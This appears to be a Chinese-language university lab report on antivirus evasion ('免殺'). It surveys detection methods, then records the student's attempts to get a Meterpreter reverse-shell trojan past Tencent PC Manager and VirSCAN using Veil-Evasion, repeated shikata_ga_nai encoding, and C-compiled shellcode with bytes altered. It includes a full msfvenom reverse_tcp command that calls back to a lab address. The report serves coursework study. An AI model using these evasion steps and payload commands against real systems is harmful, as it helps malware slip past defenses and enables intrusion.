20145320免殺原理與實踐

20145320免殺原理與實踐

1.基礎問題回答

（1）殺軟是如何檢測出惡意代碼的？

惡意代碼檢測方式

• 1.基於特徵碼的檢測

• 2.啓發式惡意軟件檢測

• 3.基於行爲的惡意軟件檢測
  （2）免殺是作什麼？

• 免殺，也就是反病毒（AntiVirus）與反間諜（AntiSpyware）的對立面，英文爲Anti-AntiVirus（簡寫Virus AV），逐字翻譯爲「反-反病毒」，翻譯爲「反殺毒技術」。 被誰殺？固然是被殺毒軟件（引擎）殺。因此，要作好免殺技術（防護），就要弄清殺毒方式（攻擊），也就是這些殺毒軟件是如何工做的。

（3）免殺的基本方法有哪些？

• 改變特徵碼

• 改變行爲

• 其它方法

2.實踐過程記錄

嘗試將上個實踐生成的一個生成可執行（反彈式）木馬程序攻擊我所使用的win10主機，所使用的殺毒軟件時騰訊的電腦管家。
剛將生成的後面軟件拖到win10主機中就被電腦管家當作木馬回收了，

可是當我第二次將這個後面軟件拖到桌面時，則被告知安全？！

雙擊發現並不能運行，看來仍是沒有放過他。

一樣嘗試經過VirSCAN.org來檢驗一下

從上圖能夠看出，共有20款殺軟一針見血的指出了該程序爲「木馬類」程序，可是其中並不包括360。（這應該是沒有更新360的版本的緣故，由於以前我在作實踐2的時候所使用的360殺毒軟件也能夠秒殺個人後面軟件，後來才換成了電腦管家）

接下來咱們將針對殺軟如何判斷某個軟件是否爲病毒的方法來打造咱們的病毒！

基於特徵碼的改變來實現免殺

使用Veil-Evasion免殺平臺

生成過程這裏再也不列舉，你們能夠參照張薇同窗的博客

一樣使用我親愛的電腦管家看看：（win10下）
電腦管家

不愛了

再用VirSCAN.org檢測：

？？我生成了假的代碼

再生成一次：

這還差很少。。

使用shikata_ga_nai編碼器生成meterpreter可執行文件

• 一次編碼
  

反而更多了一個殺軟能夠查殺了...

• 八次編碼以後

首先使用電腦管家看看

沒問題。。

再經過VirSCAN.org看看：

依然有18款殺軟發現了這個後面軟件

C語言調用Shellcode

在kali主機下，進入終端，執行指令：msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.152.128 LPORT=8888 -f c > 5320shelldoor.c

將這個c文件複製到主機用Microsoft Visual Studio 2013進行編譯運行生成可執行文件

VirSCAN.org檢測結果以下：

只有7款殺軟件發現了！！

嘗試回連linux

成功了，此次操做的是個人帶着電腦管家的win10主機，桌面截圖以下：

此次嘗試對buf裏面的數據進行改動，這裏嘗試了按位取反：

還嘗試了逐位加1

真的大大縮小被查到的概率了！！

3.離實戰還缺些什麼技術或步驟？

上述都是使用軟件生成木馬軟件，通常都被各大殺毒軟件的病毒庫所收錄了，因此產生的木馬真的能產生做用的仍是比較少，純手工打造的木馬我如今還只知道一些皮毛，離真正的實戰還很遠...並且咱們生成的木馬如今是本身手動拖拽到主機裏面，要把這個木馬導入到別人的電腦裏面確定沒有這麼簡單，還要千方百計去製做一些陷阱，例如掛馬軟件。

4.實踐總結與體會

經過此次實驗，我瞭解到了殺毒軟件查殺的原理，知道原來殺毒軟件也是這麼水的，也知道了惡意代碼是如何想盡辦法假裝的；單純依賴查殺軟件或者防火牆是能完美保護咱們的電腦主機的？不存在的絕對安全；

道高一尺魔高一丈，殺毒與免殺就是在相互鬥爭之中不停的進步，只要互聯網還存在，殺毒與免殺的鬥爭就沒法中止；殺毒軟件的薄弱在本次實踐中可見一斑，因此之後在網絡中別隨意亂點不明連接，說不定就是同窗製做的木馬...